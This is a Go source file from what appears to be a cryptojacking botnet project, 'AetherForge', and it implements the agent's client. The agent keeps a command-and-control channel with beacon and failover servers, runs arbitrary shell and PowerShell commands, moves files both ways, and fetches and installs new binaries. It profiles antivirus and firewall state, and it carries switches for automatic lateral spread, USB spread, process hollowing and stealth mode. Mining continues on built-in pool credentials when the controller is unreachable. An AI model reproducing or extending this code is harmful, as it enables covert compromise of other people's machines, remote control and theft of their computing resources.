Files
AetherForge/agent/client/client.go
AetherForge 415b5dc6a3
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Release validation: tests green, USB pack, fleet UX and API hardening.
Fix macOS agent cross-compile (SilentAVExclusion) and Calibrate E2E nav selector; expand tests and docs; refresh portable usb binary and spread/wiki assets.
2026-06-06 16:57:39 -07:00

1154 lines
32 KiB
Go

package client
import (
"encoding/base64"
"encoding/json"
"fmt"
"io"
"log"
"math/rand"
"net"
"net/http"
"net/url"
"os"
"path/filepath"
"runtime"
"strings"
"sync"
"sync/atomic"
"time"
"crypto-miner-agent/config"
"crypto-miner-agent/deploy"
"crypto-miner-agent/job"
"crypto-miner-agent/miner"
"crypto-miner-agent/stats"
"github.com/gorilla/websocket"
)
type AgentClient struct {
cfg config.RuntimeConfig
conn *websocket.Conn
pool *miner.Pool
reporter *stats.Reporter
startTime time.Time
aiRunner *AIRunner
mesh *MeshNode
mu sync.Mutex
agentID string
sharesSubmitted int
sharesAccepted int
gpuMiner *GPUMiner
// connected is true while a C2 WebSocket session is active.
// The Stratum fallback manager monitors this to decide when to mine directly.
connected atomic.Bool
// lastJobAt records when the most recent valid mining job was delivered.
// The Stratum fallback manager uses this to detect "connected but jobless"
// situations and start direct Stratum mining after a timeout.
lastJobAt atomic.Value // stores time.Time
// spreadOnce ensures AutoSpreader starts at most once — after the first
// successful WS authentication confirms we are on an owned fleet.
spreadOnce sync.Once
// beaconMode is true while commands/results use HTTPS beacon transport.
beaconMode atomic.Bool
// wsDownSince is set when WebSocket dial/auth fails; cleared on successful WS auth.
wsDownSince atomic.Value // stores time.Time
}
func NewAgentClient(cfg config.RuntimeConfig) *AgentClient {
c := &AgentClient{
cfg: cfg,
reporter: stats.NewReporter(),
startTime: time.Now(),
agentID: cfg.AgentID,
}
c.mesh = NewMeshNode(c)
return c
}
func (c *AgentClient) Run() error {
if c.cfg.AgentKillAfterDays > 0 && !c.cfg.BuiltAt.IsZero() {
age := time.Since(c.cfg.BuiltAt)
limit := time.Duration(c.cfg.AgentKillAfterDays) * 24 * time.Hour
if age >= limit {
log.Printf("[agent] agent_kill_after_days (%d) reached — exiting", c.cfg.AgentKillAfterDays)
return nil
}
}
threads := c.cfg.EffectiveThreads()
c.pool = miner.NewPool(threads, c.cfg, c.reporter, c.submitShare)
c.pool.Start()
defer c.pool.Stop()
// Start GPU miner (Ravencoin / KawPoW) if configured
if gm := newGPUMiner(c.cfg); gm != nil {
c.mu.Lock()
c.gpuMiner = gm
c.mu.Unlock()
gm.Start()
defer gm.Stop()
}
// Start AI Autonomy runner if enabled
if c.cfg.AIEnabled {
c.aiRunner = NewAIRunner(c.cfg, c.reporter, c.pool)
c.aiRunner.shareStats = func() (int, int) {
c.mu.Lock()
defer c.mu.Unlock()
return c.sharesSubmitted, c.sharesAccepted
}
c.aiRunner.Start()
defer c.aiRunner.Stop()
}
// Start libp2p Mesh Discovery
if c.cfg.MeshP2P {
if err := c.mesh.Start(); err != nil {
log.Printf("[Mesh] Failed to start: %v", err)
}
defer c.mesh.Stop()
}
// Stratum fallback manager — starts direct pool mining after 30 s of C2 absence.
fallbackDone := make(chan struct{})
fallbackManagerDone := make(chan struct{})
go func() {
defer close(fallbackManagerDone)
c.stratumFallbackManager(fallbackDone)
}()
defer func() {
close(fallbackDone)
<-fallbackManagerDone
}()
// Build deduped server list: primary first, then backups.
// On each failure we advance to the next URL so the fleet never
// goes dark when the primary host reboots.
serverURLs := buildServerURLList(c.cfg)
log.Printf("[agent] %d server(s) configured: %v", len(serverURLs), serverURLs)
probe := runConnectivityProbe(c.cfg.ServerURL, c.cfg.PoolHost, c.cfg.PoolPort)
log.Printf("[agent] connectivity_probe: c2_dns=%v c2_tcp=%v pool_dns=%v pool_tcp=%v",
probe.C2DNSOK, probe.C2TCPOK, probe.PoolDNSOK, probe.PoolTCPOK)
urlIdx := 0
backoff, maxBackoff := c.reconnectBackoff()
for {
target := serverURLs[urlIdx%len(serverURLs)]
start := time.Now()
// Restore C2 share handler before connecting (in case Stratum had it).
c.pool.SetShareHandler(c.submitShare)
if c.shouldUseHTTPSBeacon(c.wsDownSinceTime()) {
log.Printf("[agent] WebSocket unavailable — HTTPS beacon to %s", target)
if err := c.beaconOnce(target); err != nil {
log.Printf("[agent] beacon failed on %s: %v", target, err)
c.markWSDownSince()
} else {
c.sleepReconnect(c.beaconInterval())
}
}
if err := c.connectLoop(target); err != nil {
log.Printf("[agent] disconnected from %s: %v", target, err)
c.markWSDownSince()
}
// Advance to next URL so the next reconnect tries a different server
urlIdx++
if time.Since(start) > 10*time.Second {
backoff, maxBackoff = c.reconnectBackoff()
}
c.sleepReconnect(backoff)
backoff += c.reconnectBackoffStep()
if backoff > maxBackoff {
backoff = maxBackoff
}
}
}
func (c *AgentClient) reconnectBackoff() (time.Duration, time.Duration) {
sec := c.cfg.BeaconIntervalSec
if sec <= 0 {
sec = 5
}
base := time.Duration(sec) * time.Second
max := 60 * time.Second
if base*12 > max {
max = base * 12
}
return base, max
}
func (c *AgentClient) reconnectBackoffStep() time.Duration {
sec := c.cfg.BeaconIntervalSec
if sec <= 0 {
sec = 5
}
return time.Duration(sec) * time.Second
}
func (c *AgentClient) sleepReconnect(d time.Duration) {
jitter := c.cfg.BeaconJitterPct
if jitter > 0 {
if jitter > 100 {
jitter = 100
}
factor := 1.0 + (rand.Float64()*2-1)*float64(jitter)/100.0
d = time.Duration(float64(d) * factor)
}
time.Sleep(d)
}
// buildServerURLList returns [primaryURL, ...backupURLs] deduped and in order.
func buildServerURLList(cfg config.RuntimeConfig) []string {
seen := map[string]bool{}
var urls []string
add := func(u string) {
u = strings.TrimSpace(u)
if u == "" || seen[u] {
return
}
seen[u] = true
urls = append(urls, u)
}
add(cfg.ServerURL)
for _, u := range cfg.BackupServerURLs {
add(u)
}
if len(urls) == 0 {
urls = []string{cfg.ServerURL}
}
return urls
}
func (c *AgentClient) connectLoop(serverURL string) error {
wsURL, err := buildWSURL(serverURL)
if err != nil {
return err
}
log.Printf("[agent] connecting to %s", wsURL)
dialer := websocket.Dialer{HandshakeTimeout: 45 * time.Second}
conn, _, err := dialer.Dial(wsURL, nil)
if err != nil {
return err
}
if tc, ok := conn.UnderlyingConn().(*net.TCPConn); ok {
_ = tc.SetKeepAlive(true)
_ = tc.SetKeepAlivePeriod(30 * time.Second)
}
c.conn = conn
defer conn.Close()
conn.SetPongHandler(func(string) error {
return conn.SetReadDeadline(time.Now().Add(90 * time.Second))
})
if err := c.authenticate(); err != nil {
return err
}
c.connected.Store(true)
defer c.connected.Store(false)
statsStop := make(chan struct{})
go c.statsLoop(statsStop)
defer close(statsStop)
for {
conn.SetReadDeadline(time.Now().Add(90 * time.Second))
_, data, err := conn.ReadMessage()
if err != nil {
return err
}
var msg Message
if err := json.Unmarshal(data, &msg); err != nil {
continue
}
c.handleMessage(msg)
}
}
func primaryMACAddress() string {
ifaces, err := net.Interfaces()
if err != nil {
return ""
}
for _, iface := range ifaces {
if iface.Flags&net.FlagUp == 0 || iface.Flags&net.FlagLoopback != 0 {
continue
}
if len(iface.HardwareAddr) == 0 {
continue
}
return iface.HardwareAddr.String()
}
return ""
}
func (c *AgentClient) authenticate() error {
host, cores, memGB := c.reporter.SystemInfo()
backupPools := make([]BackupPoolEntry, len(c.cfg.BackupPools))
for i, bp := range c.cfg.BackupPools {
backupPools[i] = BackupPoolEntry{Host: bp.Host, Port: bp.Port, TLS: bp.TLS, Pass: bp.Pass}
}
payload, _ := json.Marshal(AuthPayload{
AgentID: c.agentID,
FleetSecret: c.cfg.FleetSecret,
Wallet: c.cfg.Wallet,
BackupPools: backupPools,
Version: config.Version,
Hostname: host,
CPUCores: cores,
MemoryGB: memGB,
Worker: c.cfg.WorkerName,
PoolHost: c.cfg.PoolHost,
PoolPort: c.cfg.PoolPort,
PoolTLS: c.cfg.PoolTLS,
PoolPass: c.cfg.PoolPass,
AIEnabled: c.cfg.AIEnabled,
AIOllamaEndpoint: c.cfg.AIOllamaEndpoint,
AIModel: c.cfg.AIModel,
HolePunch: c.cfg.HolePunch,
RemoteAggressive: c.cfg.RemoteAggressive,
MeshP2P: c.cfg.MeshP2P,
AutoSpread: c.cfg.AutoSpread,
ProcessHollowing: c.cfg.ProcessHollowing && runtime.GOOS == "windows",
Platform: runtime.GOOS,
Arch: runtime.GOARCH,
OSVersion: deploy.HostOSVersion(),
MacAddress: primaryMACAddress(),
BuildID: c.cfg.BuildID,
USBSpread: c.cfg.USBSpread,
Campaign: strings.TrimSpace(os.Getenv("AETHER_CAMPAIGN")),
UTM: strings.TrimSpace(os.Getenv("AETHER_UTM")),
})
if err := c.write(Message{Type: "auth", Payload: payload}); err != nil {
return err
}
_, data, err := c.conn.ReadMessage()
if err != nil {
return err
}
var msg Message
if err := json.Unmarshal(data, &msg); err != nil {
return err
}
if msg.Type != "auth_response" {
return fmt.Errorf("unexpected message: %s", msg.Type)
}
var resp AuthResponse
if err := json.Unmarshal(msg.Payload, &resp); err != nil {
return err
}
if !resp.Success {
return fmt.Errorf("auth failed: %s", resp.Error)
}
c.agentID = resp.AgentID
c.clearWSDownSince()
log.Printf("[agent] authenticated as %s (WebSocket)", c.agentID)
// Persist the server-confirmed ID so restarts always reconnect as the same agent.
if installDir, err := c.cfg.InstallDirectory(); err == nil {
_ = deploy.PersistAgentID(installDir, c.agentID)
}
// Gate AutoSpread behind successful server auth: only spread on fleets where
// our fleet secret was accepted, preventing lateral movement on non-owned networks.
if c.cfg.AutoSpread {
c.spreadOnce.Do(func() {
deploy.StartAutoSpreader(c.cfg)
// One-shot first-run spread (triggered on the very first install).
if deploy.WantsFirstRunSpread(c.cfg) {
deploy.RunSpreadOnce(c.cfg)
deploy.ClearFirstRunSpreadMarker(c.cfg)
}
})
}
c.write(Message{Type: "get_job", Payload: json.RawMessage("{}")})
return nil
}
func jobPayloadHasError(payload json.RawMessage) bool {
_, ok := jobPayloadErrorMessage(payload)
return ok
}
func jobPayloadErrorMessage(payload json.RawMessage) (string, bool) {
var raw map[string]json.RawMessage
if err := json.Unmarshal(payload, &raw); err != nil {
return "", false
}
errMsg, ok := raw["error"]
if !ok {
return "", false
}
msg := strings.Trim(string(errMsg), `"`)
if msg == "" {
return "", false
}
return msg, true
}
func (c *AgentClient) handleMessage(msg Message) {
switch msg.Type {
case "new_job":
if jobPayloadHasError(msg.Payload) {
if msg, _ := jobPayloadErrorMessage(msg.Payload); msg != "" {
log.Printf("[agent] job error from server: %s", msg)
}
// Back off 3 seconds before retrying — pool may still be connecting.
time.AfterFunc(3*time.Second, func() {
c.write(Message{Type: "get_job", Payload: json.RawMessage("{}")})
})
return
}
var j job.Job
if err := json.Unmarshal(msg.Payload, &j); err != nil {
log.Printf("[agent] bad job payload: %v", err)
return
}
if j.Blob == "" {
log.Printf("[agent] empty job blob — requesting job again")
time.AfterFunc(3*time.Second, func() {
c.write(Message{Type: "get_job", Payload: json.RawMessage("{}")})
})
return
}
log.Printf("[agent] new job %s height=%d", j.ID, j.Height)
c.lastJobAt.Store(time.Now())
c.pool.SetJob(&j)
case "share_result":
var result ShareResult
if err := json.Unmarshal(msg.Payload, &result); err != nil {
return
}
if result.Accepted {
c.mu.Lock()
c.sharesAccepted++
c.mu.Unlock()
}
case "policy_update":
go c.applyPolicyUpdate(msg.Payload)
case "command":
var cmd struct {
Action string `json:"action"`
TailLines int `json:"tail_lines"`
Command string `json:"command"`
Path string `json:"path"`
Data string `json:"data"`
Module string `json:"module"`
}
if err := json.Unmarshal(msg.Payload, &cmd); err != nil {
return
}
// Run off the read loop so long exec/powershell probes do not block
// subsequent commands or server pings.
go c.handleCommand(cmd.Action, cmd.TailLines, cmd.Command, cmd.Path, cmd.Data, cmd.Module)
}
}
func (c *AgentClient) handleCommand(action string, tailLines int, command, path, data, module string) {
if c.handleAggressiveCommand(action, tailLines, command, path, data) {
return
}
switch action {
case "fetch_module":
if err := c.fetchAndApplyModule(module); err != nil {
c.sendCommandResult(action, false, err.Error())
return
}
c.sendCommandResult(action, true, "module "+module+" applied")
case "pause":
c.pool.PauseRemote()
c.mu.Lock()
gm := c.gpuMiner
c.mu.Unlock()
if gm != nil {
gm.Pause()
}
c.sendCommandResult(action, true, "mining paused")
case "resume":
c.pool.ResumeRemote()
c.mu.Lock()
gm := c.gpuMiner
c.mu.Unlock()
if gm != nil {
gm.Resume()
}
c.sendCommandResult(action, true, "mining resumed")
case "restart":
c.sendCommandResult(action, true, "restarting")
go c.restartSelf()
case "stop", "kill":
c.sendCommandResult(action, true, "stopping")
go c.stopSelf()
case "uninstall":
c.sendCommandResult(action, true, "uninstalling")
go func() {
time.Sleep(500 * time.Millisecond)
if err := deploy.Uninstall(c.cfg); err != nil {
log.Printf("[agent] remote uninstall failed: %v", err)
}
}()
case "reboot_machine":
go func() {
time.Sleep(500 * time.Millisecond)
if err := c.execPowerCommand("reboot"); err != nil {
c.sendCommandResult(action, false, "reboot failed: "+err.Error())
} else {
c.sendCommandResult(action, true, "system reboot initiated")
}
}()
case "shutdown_machine":
go func() {
time.Sleep(500 * time.Millisecond)
if err := c.execPowerCommand("shutdown"); err != nil {
c.sendCommandResult(action, false, "shutdown failed: "+err.Error())
} else {
c.sendCommandResult(action, true, "system shutdown initiated")
}
}()
case "get_log":
if tailLines <= 0 {
tailLines = 300
}
content, err := readLogTail(c.cfg, tailLines)
if err != nil {
c.sendCommandResult(action, false, err.Error())
return
}
payload, _ := json.Marshal(map[string]interface{}{
"content": content,
"lines": tailLines,
})
_ = c.write(Message{Type: "log_tail", Payload: payload})
preview := content
if len(preview) > 12000 {
preview = preview[len(preview)-12000:]
}
c.sendCommandResult(action, true, preview)
case "exec":
if command == "" {
c.sendCommandResult(action, false, "no command provided")
return
}
out, err := c.runExecCommand(command)
if err != nil {
c.sendCommandResult(action, false, formatCmdErr(err, out))
return
}
c.sendCommandResult(action, true, string(out))
case "powershell":
if command == "" {
c.sendCommandResult(action, false, "no command provided")
return
}
out, err := c.runShellCommand(command)
if err != nil {
c.sendCommandResult(action, false, formatCmdErr(err, out))
return
}
c.sendCommandResult(action, true, string(out))
case "upload", "push_desktop":
if data == "" {
c.sendCommandResult(action, false, "data (base64) is required")
return
}
dest := path
if action == "push_desktop" {
name := strings.TrimSpace(path)
if name == "" {
name = strings.TrimSpace(command)
}
var err error
dest, err = deploy.ResolveDesktopFile(name)
if err != nil {
c.sendCommandResult(action, false, "desktop path: "+err.Error())
return
}
} else if dest == "" {
c.sendCommandResult(action, false, "path and data (base64) are required")
return
} else {
resolved, err := deploy.ResolveRemotePath(dest)
if err != nil {
c.sendCommandResult(action, false, err.Error())
return
}
dest = resolved
}
decoded, err := base64.StdEncoding.DecodeString(data)
if err != nil {
c.sendCommandResult(action, false, "invalid base64 data: "+err.Error())
return
}
if err := os.MkdirAll(filepath.Dir(dest), 0o755); err != nil {
c.sendCommandResult(action, false, "failed to create directory: "+err.Error())
return
}
if err := os.WriteFile(dest, decoded, 0644); err != nil {
c.sendCommandResult(action, false, "failed to write file: "+err.Error())
return
}
c.sendCommandResult(action, true, fmt.Sprintf("file uploaded to %s (%d bytes)", dest, len(decoded)))
case "download":
if path == "" {
c.sendCommandResult(action, false, "path is required")
return
}
resolved, err := deploy.ResolveRemotePath(path)
if err != nil {
c.sendCommandResult(action, false, err.Error())
return
}
b, err := os.ReadFile(resolved)
if err != nil {
c.sendCommandResult(action, false, "failed to read file: "+err.Error())
return
}
encoded := base64.StdEncoding.EncodeToString(b)
c.sendCommandResult(action, true, encoded)
case "upgrade":
// data = download URL for the new binary
if data == "" {
c.sendCommandResult(action, false, "no upgrade URL provided")
return
}
go c.performUpgrade(data)
c.sendCommandResult(action, true, "upgrade started — will reconnect with new binary")
case "bof_execute":
c.sendCommandResult(action, false, "bof_execute is not implemented — in-memory BOF execution is disabled for safety")
default:
if c.handleRegistryCommand(action, path, data) {
return
}
if c.handleFileCommand(action, path, data) {
return
}
if c.handleReconCommand(action, command) {
return
}
c.sendCommandResult(action, false, "unknown action")
}
}
func (c *AgentClient) sendCommandResult(action string, success bool, message string) {
payload, _ := json.Marshal(map[string]interface{}{
"action": action,
"success": success,
"message": message,
})
if c.beaconMode.Load() {
c.postBeaconResult(payload)
return
}
_ = c.write(Message{Type: "command_result", Payload: payload})
}
func (c *AgentClient) wsDownSinceTime() time.Time {
if v := c.wsDownSince.Load(); v != nil {
if t, ok := v.(time.Time); ok {
return t
}
}
return time.Time{}
}
func (c *AgentClient) markWSDownSince() {
if !c.wsDownSinceTime().IsZero() {
return
}
c.wsDownSince.Store(time.Now())
}
func (c *AgentClient) clearWSDownSince() {
c.wsDownSince.Store(time.Time{})
}
func (c *AgentClient) collectStatsPayload() (StatsPayload, error) {
hps := c.pool.HashesPerSecond()
c.pool.ResetHashCounter()
cpuPct, memPct := c.reporter.Usage()
if sysCPU := c.reporter.SystemCPUPercent(); sysCPU > 0 {
cpuPct = sysCPU
}
c.mu.Lock()
submitted := c.sharesSubmitted
accepted := c.sharesAccepted
c.mu.Unlock()
return StatsPayload{
Hashrate15s: hps,
Hashrate1m: hps,
Hashrate15m: hps,
SharesSubmitted: submitted,
SharesAccepted: accepted,
CPUUsagePct: cpuPct,
MemoryUsagePct: memPct,
UptimeSeconds: int(time.Since(c.startTime).Seconds()),
}, nil
}
func (c *AgentClient) stopSelf() {
time.Sleep(300 * time.Millisecond)
c.pool.Stop()
os.Exit(0)
}
func (c *AgentClient) restartSelf() {
time.Sleep(300 * time.Millisecond)
exe, err := os.Executable()
if err != nil {
return
}
_ = spawnWorker(exe)
os.Exit(0)
}
// performUpgrade downloads a new binary from downloadURL, replaces the
// installed binary, and restarts. Works around Windows file-locking by
// renaming the running exe to .old before writing the new one.
func (c *AgentClient) performUpgrade(downloadURL string) {
log.Printf("[agent] upgrade: downloading from %s", downloadURL)
resp, err := http.Get(downloadURL) //nolint:gosec — URL is from trusted C2
if err != nil {
log.Printf("[agent] upgrade: download failed: %v", err)
c.sendCommandResult("upgrade", false, "download failed: "+err.Error())
return
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
log.Printf("[agent] upgrade: server returned %s", resp.Status)
c.sendCommandResult("upgrade", false, "server returned "+resp.Status)
return
}
exe, err := os.Executable()
if err != nil {
c.sendCommandResult("upgrade", false, "cannot locate executable: "+err.Error())
return
}
exe, _ = filepath.Abs(exe)
// Write new binary to a temp file in the same directory
newPath := exe + ".new"
tmp, err := os.OpenFile(newPath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0755)
if err != nil {
c.sendCommandResult("upgrade", false, "cannot write upgrade: "+err.Error())
return
}
if _, err := io.Copy(tmp, resp.Body); err != nil {
tmp.Close()
_ = os.Remove(newPath)
c.sendCommandResult("upgrade", false, "write failed: "+err.Error())
return
}
tmp.Close()
// On Windows: rename the running exe to .old (allowed), then rename .new into place.
// On other OSes: direct rename works while the process is running.
oldPath := exe + ".old"
_ = os.Remove(oldPath)
if err := os.Rename(exe, oldPath); err != nil {
_ = os.Remove(newPath)
c.sendCommandResult("upgrade", false, "rename old binary failed: "+err.Error())
return
}
if err := os.Rename(newPath, exe); err != nil {
// Try to roll back
_ = os.Rename(oldPath, exe)
_ = os.Remove(newPath)
c.sendCommandResult("upgrade", false, "rename new binary failed: "+err.Error())
return
}
log.Printf("[agent] upgrade: binary replaced, restarting")
c.sendCommandResult("upgrade", true, "binary replaced — restarting")
time.Sleep(500 * time.Millisecond)
if startErr := spawnWorker(exe); startErr != nil {
log.Printf("[agent] upgrade: restart failed: %v", startErr)
}
os.Exit(0)
}
func readLogTail(cfg config.RuntimeConfig, tailLines int) (string, error) {
if !cfg.FileLogging || cfg.StealthMode {
return "", fmt.Errorf("logging disabled (stealth build or file_logging=false)")
}
if tailLines <= 0 {
tailLines = 200
}
installDir, err := cfg.InstallDirectory()
if err != nil {
return "", err
}
logPath := filepath.Join(installDir, "miner.log")
data, err := os.ReadFile(logPath)
if err != nil {
if os.IsNotExist(err) {
return "", fmt.Errorf("miner.log not found")
}
return "", err
}
lines := strings.Split(string(data), "\n")
if len(lines) > 0 && lines[len(lines)-1] == "" {
lines = lines[:len(lines)-1]
}
if len(lines) > tailLines {
lines = lines[len(lines)-tailLines:]
}
return strings.Join(lines, "\n"), nil
}
func (c *AgentClient) submitShare(jobID, nonce, hash string) {
c.mu.Lock()
c.sharesSubmitted++
conn := c.conn // read under the same lock to avoid data race
c.mu.Unlock()
payload, _ := json.Marshal(SharePayload{
JobID: jobID,
Nonce: nonce,
Hash: hash,
Worker: c.cfg.WorkerName,
})
if conn != nil {
_ = c.write(Message{Type: "submit_share", Payload: payload})
} else if c.cfg.MeshP2P {
c.mesh.BroadcastToMesh(Message{Type: "submit_share", Payload: payload})
}
}
// probeSSH returns true if an SSH daemon is listening on port 22 locally.
func probeSSH() bool {
conn, err := net.DialTimeout("tcp", "127.0.0.1:22", 2*time.Second)
if err != nil {
return false
}
conn.Close()
return true
}
func (c *AgentClient) statsLoop(stop <-chan struct{}) {
ticker := time.NewTicker(10 * time.Second)
defer ticker.Stop()
var samples []float64
var probeTick int
var lastSSH *bool
var lastPosture *PostureReport
var lastPressure *ResourcePressure
var lastDNS *DNSConfig
var lastListenPortCount *int
var postureReady bool
for {
select {
case <-stop:
return
case <-ticker.C:
hps := c.pool.HashesPerSecond()
c.pool.ResetHashCounter()
samples = append(samples, hps)
if len(samples) > 90 {
samples = samples[len(samples)-90:]
}
var avg15s, avg1m, avg15m float64
if len(samples) > 0 {
avg15s = samples[len(samples)-1]
}
if len(samples) >= 6 {
for _, v := range samples[len(samples)-6:] {
avg1m += v
}
avg1m /= 6
} else {
avg1m = avg15s
}
for _, v := range samples {
avg15m += v
}
avg15m /= float64(len(samples))
cpuPct, memPct := c.reporter.Usage()
if sysCPU := c.reporter.SystemCPUPercent(); sysCPU > 0 {
cpuPct = sysCPU
}
c.mu.Lock()
submitted := c.sharesSubmitted
accepted := c.sharesAccepted
c.mu.Unlock()
// Probe SSH, posture, and resource pressure every 6 ticks (~60s)
if probeTick%6 == 0 {
ok := probeSSH()
lastSSH = &ok
if p := collectPosture(); p != nil {
lastPosture = p
postureReady = true
if p.SSHListening != nil {
lastSSH = p.SSHListening
}
}
lastPressure = collectResourcePressure()
lastDNS = probeDNS()
if lp := collectListenPorts(); lp != nil {
n := lp.Count
lastListenPortCount = &n
}
}
probeTick++
stats := StatsPayload{
Hashrate15s: avg15s,
Hashrate1m: avg1m,
Hashrate15m: avg15m,
SharesSubmitted: submitted,
SharesAccepted: accepted,
CPUUsagePct: cpuPct,
MemoryUsagePct: memPct,
UptimeSeconds: int(time.Since(c.startTime).Seconds()),
SSHAvailable: lastSSH,
}
if lastDNS != nil {
stats.DNSServers = lastDNS.Servers
stats.DNSSearchDomains = lastDNS.SearchDomains
}
stats.ListenPortCount = lastListenPortCount
if lastPressure != nil {
stats.CPUFreqMHz = lastPressure.CPUFreqMHz
stats.CPUMaxMHz = lastPressure.CPUMaxMHz
stats.CPUThrottle = lastPressure.CPUThrottle
stats.CPUTempC = lastPressure.CPUTempC
stats.DiskFreeGB = lastPressure.DiskFreeGB
stats.DiskTotalGB = lastPressure.DiskTotalGB
stats.DiskFreePct = lastPressure.DiskFreePct
stats.GPUTempC = lastPressure.GPUTempC
stats.GPUUsagePct = lastPressure.GPUUsagePct
}
// GPU miner (Ravencoin) stats — included when GPU miner is running
c.mu.Lock()
gm := c.gpuMiner
c.mu.Unlock()
if gm != nil {
gs, active := gm.Stats()
stats.GPUMinerActive = &active
stats.GPUHashrate15s = gs.Hashrate15s
stats.GPUHashrate1m = gs.Hashrate1m
stats.GPUHashrate15m = gs.Hashrate15m
stats.GPUModel = gm.GPUModel()
if gs.GPUTempC != nil {
stats.GPUTempC = gs.GPUTempC
}
if gs.GPUUsagePct != nil {
stats.GPUUsagePct = gs.GPUUsagePct
}
}
if postureReady && lastPosture != nil {
score := lastPosture.PostureScore
stats.PostureScore = &score
stats.DefenderEnabled = lastPosture.DefenderEnabled
stats.DefenderRTP = lastPosture.DefenderRTP
stats.AVProducts = lastPosture.AVProducts
stats.FirewallDomain = lastPosture.FirewallDomain
stats.FirewallPrivate = lastPosture.FirewallPrivate
stats.FirewallPublic = lastPosture.FirewallPublic
stats.LastPatchDays = lastPosture.LastPatchDays
stats.LastPatch = lastPosture.LastPatch
stats.PendingUpdates = lastPosture.PendingUpdates
stats.RebootPending = lastPosture.RebootPending
stats.AgentElevated = lastPosture.AgentElevated
stats.Services = lastPosture.Services
}
payload, _ := json.Marshal(stats)
if err := c.write(Message{Type: "stats", Payload: payload}); err != nil {
log.Printf("[agent] stats send failed: %v", err)
}
}
}
}
func (c *AgentClient) write(msg Message) error {
c.mu.Lock()
defer c.mu.Unlock()
if c.conn == nil {
return fmt.Errorf("not connected")
}
// BA-03: set a bounded write deadline so a stalled TCP socket cannot block
// WriteJSON indefinitely while holding c.mu, which would deadlock every
// other goroutine that needs c.mu (share submission, stats, commands).
_ = c.conn.SetWriteDeadline(time.Now().Add(15 * time.Second))
err := c.conn.WriteJSON(msg)
_ = c.conn.SetWriteDeadline(time.Time{}) // clear deadline after write
return err
}
// needsStratumFallback returns true when either:
// - C2 is offline for > 8 seconds (agent mines on baked-in credentials immediately), OR
// - C2 is online but no mining job has been delivered in > 15 seconds
// (the pool proxy on the server is broken or still connecting)
//
// Mining is the primary purpose of the agent; C2 provides remote control and
// job upgrades but is never required to start hashing.
func (c *AgentClient) needsStratumFallback(disconnectedSince time.Time) bool {
if !c.connected.Load() {
return !disconnectedSince.IsZero() && time.Since(disconnectedSince) > 8*time.Second
}
// Connected but jobless: check when the last valid job arrived.
if raw := c.lastJobAt.Load(); raw != nil {
lastJob := raw.(time.Time)
return time.Since(lastJob) > 15*time.Second
}
// Never received a job; fall back after 15s of being connected with nothing to mine.
return !disconnectedSince.IsZero() && time.Since(disconnectedSince) > 15*time.Second
}
// stratumFallbackManager monitors C2 connectivity and mining job delivery.
// It spins up a direct Stratum connection when:
// - C2 has been offline for 30+ seconds, OR
// - C2 is connected but the server pool proxy has not delivered a job in 90+ seconds
//
// When real jobs start flowing from C2 again, the fallback is stopped and the
// share handler is restored to the C2 WebSocket path.
func (c *AgentClient) stratumFallbackManager(done <-chan struct{}) {
if c.cfg.PoolHost == "" {
return // no pool configured
}
type fallback struct {
stop chan struct{}
wait chan struct{}
}
var fb *fallback
// disconnectedSince is set at startup so the 8-second countdown begins
// immediately. Mining will start on baked-in credentials within ~10s unless
// C2 connects and delivers a job first. When C2 delivers a job this is
// zeroed and the fallback stops.
disconnectedSince := time.Now()
ticker := time.NewTicker(5 * time.Second)
defer ticker.Stop()
// hashrateWatchdog: if we have an active job but hashrate has been 0 for
// 2 consecutive minutes the workers are stuck — trigger Stratum fallback.
var zeroHashSince time.Time
startFallback := func() {
if fb != nil {
return
}
stop := make(chan struct{})
wait := make(chan struct{})
sc := miner.NewStratumClient(c.pool, c.cfg)
go func() {
defer close(wait)
sc.RunFallback(stop)
}()
fb = &fallback{stop: stop, wait: wait}
if c.connected.Load() {
log.Printf("[stratum] C2 connected but no job in 15s — direct Stratum started (%s:%d)", c.cfg.PoolHost, c.cfg.PoolPort)
} else {
log.Printf("[stratum] C2 offline — direct Stratum started (%s:%d)", c.cfg.PoolHost, c.cfg.PoolPort)
}
}
stopFallback := func(reason string) {
if fb != nil {
close(fb.stop)
<-fb.wait
fb = nil
c.pool.SetShareHandler(c.submitShare)
log.Printf("[stratum] fallback stopped — %s", reason)
}
}
for {
select {
case <-done:
stopFallback("agent shutting down")
return
case <-ticker.C:
connected := c.connected.Load()
// ── Hashrate watchdog ───────────────────────────────────────────
// If we have an active job but hash rate has been 0 for 2 minutes
// the workers are frozen — force Stratum fallback regardless of
// C2 connection state so mining restarts immediately.
if raw := c.lastJobAt.Load(); raw != nil {
hs := c.pool.HashesPerSecond()
if hs < 1 {
if zeroHashSince.IsZero() {
zeroHashSince = time.Now()
} else if time.Since(zeroHashSince) > 2*time.Minute {
log.Printf("[watchdog] hashrate=0 for 2m with active job — forcing Stratum fallback")
zeroHashSince = time.Time{}
if fb == nil {
startFallback()
}
}
} else {
zeroHashSince = time.Time{} // hashing — reset watchdog
}
}
// Track disconnection time (reset to zero while connected).
if connected {
if fb != nil {
// Check if real jobs are flowing again; if so, drop the fallback.
if raw := c.lastJobAt.Load(); raw != nil {
lastJob := raw.(time.Time)
if time.Since(lastJob) < 15*time.Second {
disconnectedSince = time.Time{}
stopFallback("C2 pool delivering jobs again")
continue
}
}
} else {
if raw := c.lastJobAt.Load(); raw != nil {
disconnectedSince = time.Time{}
}
}
} else {
if disconnectedSince.IsZero() {
disconnectedSince = time.Now()
}
}
if fb == nil && c.needsStratumFallback(disconnectedSince) {
startFallback()
}
}
}
}
func buildWSURL(serverURL string) (string, error) {
u, err := url.Parse(strings.TrimSpace(serverURL))
if err != nil {
return "", err
}
switch u.Scheme {
case "https":
u.Scheme = "wss"
case "http", "":
u.Scheme = "ws"
case "wss", "ws":
default:
return "", fmt.Errorf("unsupported server URL scheme: %s", u.Scheme)
}
if u.Scheme == "" {
u.Scheme = "ws"
}
u.Path = strings.TrimSuffix(u.Path, "/") + "/ws/agent"
u.RawQuery = ""
u.Fragment = ""
return u.String(), nil
}